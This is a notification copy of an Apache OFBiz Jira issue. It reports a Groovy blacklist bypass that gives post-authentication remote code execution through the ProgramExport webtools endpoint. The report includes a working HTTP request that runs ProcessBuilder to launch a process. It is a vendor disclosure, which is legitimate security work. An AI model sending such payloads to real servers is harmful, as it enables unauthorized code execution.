You are viewing a plain text version of this content. The canonical link for it is here.
Posted to notifications@ofbiz.apache.org by "Y4er (Jira)" <ji...@apache.org> on 2022/02/10 09:52:00 UTC
[jira] [Created] (OFBIZ-12571) groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
Y4er created OFBIZ-12571:
----------------------------
Summary: groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
Key: OFBIZ-12571
URL: https://issues.apache.org/jira/browse/OFBIZ-12571
Project: OFBiz
Issue Type: Bug
Components: framework/webtools
Affects Versions: 18.12.05
Environment: ofbiz 18.12.05
Reporter: Y4er
Attachments: image-2022-02-10-17-50-58-914.png
groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
{code:java}
POST /webtools/control/ProgramExport HTTP/1.1
Host: 192.168.1.178:8443
Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; webtools.securedLoginId=admin; OFBiz.Visitor=10302
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 68
groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 {code}
!image-2022-02-10-17-50-58-914.png!
--
This message was sent by Atlassian Jira
(v8.20.1#820001)